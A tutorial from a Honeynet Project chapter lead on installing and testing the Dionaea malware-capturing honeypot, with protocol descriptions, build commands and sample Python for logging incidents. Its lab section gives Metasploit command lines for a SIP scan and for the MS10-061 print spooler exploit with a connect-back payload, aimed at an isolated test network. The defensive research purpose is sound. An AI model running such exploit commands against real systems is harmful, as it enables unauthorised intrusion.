Dionaea – A Malware Capturing Honeypot
Introduction to Dionaea
Dionaea, “the Nepenthes successor”, is a malware-capturing honeypot initially developed under The Honeynet Project's 2009 Google Summer of Code (GSoC). Dionaea aims to trap malware exploiting vulnerabilities exposed by services offered over a network, and ultimately to obtain a copy of the malware.
Dionaea features a modular architecture, embedding Python as its scripting language in order to emulate protocols. Much superior to its predecessor (Nepenthes), it is able to detect shellcode using LibEmu and supports IPv6 and TLS.
Security of Dionaea
Like any other software, Dionaea is likely to contain exploitable bugs. To minimise the impact, Dionaea runs in a restricted environment without administrative privileges.
Protocols Dionaea Traps Malware From
Server Message Block (SMB) – SMB is the main protocol offered by Dionaea. SMB has a decent history of remote exploitable bugs and is a very popular target for worms.
Hypertext Transfer Protocol (HTTP) – Dionaea supports HTTP on port 80 as well as HTTPS. A self-signed SSL certificate is created at startup for HTTPS.
File Transfer Protocol (FTP) – Dionaea provides a basic FTP server on port 21. It allows the creation of directories and uploading and downloading of files.
Trivial File Transfer Protocol (TFTP) – Dionaea provides a TFTP server on port 60 which can be used to serve files.
Microsoft SQL Server (MSSQL) – Dionaea implements the Tabular Data Stream protocol used by Microsoft SQL Server. Listening on TCP/1433 and allowing clients to log in, it can decode the queries run against the database.
Voice over IP (VoIP) – Developed as part of GSoC 2011 by PhiBo, the VoIP protocol used in Dionaea is the Session Initiation Protocol (SIP). This module does not connect to an external VoIP registrar/server; it simply waits for incoming SIP messages, logs all data as incidents and/or binary data dumps, and reacts accordingly.
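To make the SIP module's behaviour concrete, here is an added illustration (not Dionaea's own SIP code) of the honeypot side of an OPTIONS probe: parse the request, record an incident describing the sender, and answer so the endpoint looks live. The incident field names and the sample message are my own assumptions.

```python
"""Honeypot-side handling of a SIP OPTIONS probe: parse the request, record an
incident describing the sender, and answer so the endpoint looks live.
Illustration only, not Dionaea's SIP module; incident field names are assumed."""
import re

# Constructed sample: an OPTIONS request as a SIP scanner would send it.
SAMPLE_OPTIONS = (
    "OPTIONS sip:100@192.168.1.2 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.12:5066;branch=z9hG4bK-constructed\r\n"
    "From: <sip:probe@192.168.1.12>;tag=c0ffee\r\n"
    "To: <sip:100@192.168.1.2>\r\n"
    "Call-ID: constructed-call-id@192.168.1.12\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "User-Agent: constructed-scanner/1.0\r\n"
    "Content-Length: 0\r\n\r\n"
)
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/2\.0$")

def parse_sip(raw):
    """Split a SIP request into (method, request-uri, {header: value})."""
    head = raw.partition("\r\n\r\n")[0].split("\r\n")
    m = REQUEST_LINE.match(head[0])
    if not m:
        raise ValueError("not a SIP request line: %r" % head[0])
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")  # first colon ends the header name
        headers[name.strip().lower()] = value.strip()
    return m.group(1), m.group(2), headers

def handle_sip(raw, remote=("192.168.1.12", 5066)):
    """Return (incident, response) for one inbound SIP message from remote=(host, port)."""
    method, uri, headers = parse_sip(raw)
    incident = {  # what gets logged for later correlation
        "remote_host": remote[0], "remote_port": remote[1],
        "method": method, "uri": uri,
        "user_agent": headers.get("user-agent", ""),
        "call_id": headers.get("call-id", ""),
    }
    if method != "OPTIONS":
        return incident, None  # other methods need their own handlers
    # RFC 3261: a 200 OK echoes Via/From/Call-ID/CSeq and adds a To tag.
    echoed = tuple(headers.get(h, "") for h in ("via", "from", "to", "call-id", "cseq"))
    response = (
        "SIP/2.0 200 OK\r\nVia: %s\r\nFrom: %s\r\nTo: %s;tag=honey\r\n"
        "Call-ID: %s\r\nCSeq: %s\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE\r\n"
        "Content-Length: 0\r\n\r\n" % echoed
    )
    return incident, response
```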
Dionaea uses LibEmu to detect and evaluate payloads sent by attackers in order to obtain a copy of the malware.
LibEmu is used to detect, measure and, if necessary, execute the shellcode. Shellcode measurement/profiling is performed by executing the shellcode in the LibEmu VM and recording API calls and their arguments. This is sufficient for profiling most shellcodes, but not for multi-stage shellcodes: in addition to recording API calls and arguments, we need to allow the shellcode to take actions (e.g. creating a network connection).
Once we have obtained the payload and its profile, we have to act upon it in order to acquire a copy of the malware. The following are some common techniques used by attackers, and how Dionaea acts upon them:
Shell Binding / Connect Back, Exec – Dionaea offers shell emulation for payloads that offer a shell to the attacker (usually via port binding or connecting back to the attacker).
URLDownloadToFile API – Again, Dionaea offers shell emulation and acts upon shellcodes that use the URLDownloadToFile API call to retrieve files via HTTP and execute the retrieved files afterwards.
Multi-Stage Payloads – We never know what to expect from the subsequent stage, so LibEmu is used to execute the shellcode in the LibEmu VM.
To keep things simple, Dionaea offers the option to write information/logs to text files. However, as with any other service, logging to text files is not a scalable solution.
In addition to that, Dionaea uses a communication system, known as incidents, that is much superior to text logging. Incidents, containing information about the origin and properties of an “attack”, are passed to incident handlers (iHandlers). The LogSQL Python script is an iHandler that writes interesting incidents to an SQLite database. One advantage of incident logging is the ability to cluster information based on the initial attack when retrieving data from the database.
On top of the local logging system, Dionaea can also be configured to send log streams to an XMPP server.
Once you’ve obtained a copy of the malware, you have the option to either store the binaries locally or submit the file to external tools or services (e.g. CWSandbox, Norman Sandbox, VirusTotal, Anubis, etc.) for further analysis.
Setting Up a Dionaea Honeypot
I set up my Dionaea honeypot on my Ubuntu 12.04.4 LTS machine.
I install all dependencies under /opt/dionaea.
apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
cd /opt/
git clone git://git.carnivore.it/dionaea.git dionaea

cd /opt/
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
./configure --prefix=/opt/dionaea
make install

cd /opt/
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
make install

cd /opt/
wget http://dist.schmorp.de/libev/Attic/libev-4.04.tar.gz
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
./configure --prefix=/opt/dionaea
make install

cd /opt/
wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
tar -xvzf libpcap-1.1.1.tar.gz
cd libpcap-1.1.1
./configure --prefix=/opt/dionaea
make && make install
Install Python 3.2.2
cd /opt/
wget http://www.python.org/ftp/python/3.2.2/Python-3.2.2.tgz
tar -xvzf Python-3.2.2.tgz
cd Python-3.2.2
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make && make install

cd /opt/
wget http://cython.org/release/Cython-0.16.tar.gz
tar -xvzf Cython-0.16.tar.gz
cd Cython-0.16
/opt/dionaea/bin/python3 setup.py install

cd /opt/dionaea
autoreconf -vi
./configure \
  --with-lcfg-include=/opt/dionaea/include/ \
  --with-lcfg-lib=/opt/dionaea/lib/ \
  --with-python=/opt/dionaea/bin/python3.2 \
  --with-cython-dir=/opt/dionaea/bin \
  --with-udns-include=/opt/dionaea/include/ \
  --with-udns-lib=/opt/dionaea/lib/ \
  --with-emu-include=/opt/dionaea/include/ \
  --with-emu-lib=/opt/dionaea/lib/ \
  --with-gc-include=/usr/include/gc \
  --with-ev-include=/opt/dionaea/include \
  --with-ev-lib=/opt/dionaea/lib \
  --with-nl-include=/opt/dionaea/include \
  --with-nl-lib=/opt/dionaea/lib/ \
  --with-curl-config=/usr/bin/ \
  --with-pcap-include=/opt/dionaea/include \
  --with-pcap-lib=/opt/dionaea/lib/
make && make install
Test If Your Installation Works
Before you put your Dionaea honeypot live on the network, you need to configure it for your environment and preferences. The Dionaea configuration file, dionaea.conf, is located in /opt/dionaea/etc/dionaea/.
Dionaea In Action
Before we get all excited and start attacking the newly set up Dionaea honeypot, let’s first set up an isolated network.
I have Dionaea set up on my Ubuntu 12.04.4 LTS machine (IP address: 192.168.1.2), and a Debian Jessie box (IP address: 192.168.1.12) set up as my attacking machine, with Metasploit and Nmap as my attacking tools.
With my isolated network set up, let’s get Dionaea up and running!
/opt/dionaea/bin/dionaea -r /opt/dionaea
Capturing Reconnaissance Operations
I performed reconnaissance using Nmap. From the attacking machine you should see Dionaea “providing” all sorts of services; on the other end of the network, you should see Dionaea picking up the traffic.
Capturing SIP Options Scan
Next, perform a more specific type of scan, a SIP Options Scan, using Metasploit:
/opt/metasploit/msf3/msfcli auxiliary/scanner/sip/options CHOST=192.168.1.12 CPORT=5066 RHOST=192.168.1.2 RPORT=5060 E
Look into the Dionaea text log file, located at /opt/dionaea/var/log/dionaea.log: there you can investigate connection traffic and look for possible attack indicators.
Reading Dionaea’s verbose text log can be a pain. Alternatively, you can view attack traffic as incidents by querying the LogSQL SQLite database.
Using the ReadLogSQLTree Python script provided, we can view attack traffic as incidents:
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Information logged in each incident includes the exploited vulnerability, time, attacker, information about shellcodes, and files offered for download.
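The "cluster by initial attack" idea behind incident logging, and what readlogsqltree reconstructs from the database, can be shown with a small query over the LogSQL tables. This is an added illustration, not Dionaea's readlogsqltree; the three tables are a trimmed subset of the logsql schema as I recall it, so the column names and the sample rows are assumptions.

```python
"""Walk a Dionaea-style logsql database and cluster every connection, offer and
download under the initial attack (the root connection).  Added illustration, not
Dionaea's readlogsqltree; tables are a trimmed subset of the schema (assumption)."""
import sqlite3

SCHEMA = """
CREATE TABLE connections (connection INTEGER PRIMARY KEY, connection_type TEXT,
  connection_protocol TEXT, connection_timestamp INTEGER, connection_root INTEGER,
  connection_parent INTEGER, remote_host TEXT, remote_port INTEGER);
CREATE TABLE offers (offer INTEGER PRIMARY KEY, connection INTEGER, offer_url TEXT);
CREATE TABLE downloads (download INTEGER PRIMARY KEY, connection INTEGER,
  download_url TEXT, download_md5_hash TEXT);
"""
# Constructed sample: SMB session (root, id 1) -> connect-back shell (id 2) -> fetch (id 3).
SAMPLE_ROWS = {
    "connections": [
        (1, "accept", "smbd", 1400000000, 1, 1, "192.168.1.12", 50210),
        (2, "connect", "remoteshell", 1400000005, 1, 1, "192.168.1.12", 4444),
        (3, "connect", "httpd", 1400000009, 1, 2, "192.168.1.12", 80),
    ],
    "offers": [(1, 2, "http://192.168.1.12/PLACEHOLDER.exe")],   # placeholder URL
    "downloads": [(1, 3, "http://192.168.1.12/PLACEHOLDER.exe", "0" * 32)],  # placeholder md5
}
BINARIES = "/opt/dionaea/var/dionaea/binaries/"  # files stored under their md5 (assumption)

def load_sample():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        db.executemany("INSERT INTO %s VALUES (%s)" % (table, marks), rows)
    return db

def incident_tree(db, root):
    """Return everything logged under one initial attack, keyed by its root id."""
    cols = ("id", "type", "protocol", "remote_host", "remote_port", "parent")
    conns = db.execute(
        "SELECT connection, connection_type, connection_protocol, remote_host, "
        "remote_port, connection_parent FROM connections "
        "WHERE connection_root = ? ORDER BY connection", (root,)).fetchall()
    tree = {"root": root, "connections": [dict(zip(cols, c)) for c in conns],
            "offers": [], "downloads": []}
    if not conns:
        return tree  # unknown root: nothing to cluster
    ids = tuple(c[0] for c in conns)
    marks = ",".join("?" * len(ids))
    tree["offers"] = [r[0] for r in db.execute("SELECT offer_url FROM offers WHERE connection IN (%s)" % marks, ids)]
    tree["downloads"] = [{"url": u, "md5": h, "path": BINARIES + h} for u, h in db.execute(
        "SELECT download_url, download_md5_hash FROM downloads WHERE connection IN (%s)" % marks, ids)]
    return tree
```

On a real logsql.sqlite you would open the file instead of the in-memory sample and pick root ids from connections where connection_root equals connection.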
Capturing MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
We’ve seen how Dionaea reacts to service scanning. Let’s see how it fares when we include shellcode in our attack.
Knowing that Dionaea emulates the SMB service to trap malware, let’s exploit a remote code execution vulnerability found in the Print Spooler Service on Microsoft Windows systems (MS10-061):
/opt/metasploit/msf3/msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.1.2 EXITFUNC=process LHOST=192.168.1.12 LPORT=4444 E
Dionaea captured the binary and offers it for further analysis. These captured/downloaded binaries are available in /opt/dionaea/var/dionaea/binaries.
References
VMware Network Isolation for a Malware Analysis Lab, Lenny Zeltser. Aug 15, 2011.
Dionaea Emulates MS10-061, Markus Koetter. Sep 26, 2010.
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution, Microsoft Knowledge Base.
Microsoft Print Spooler Service Impersonation Vulnerability, Rapid7 Vulnerability & Exploit Database.
Emil Tan, Chapter Lead, The Honeynet Project, Singapore Chapter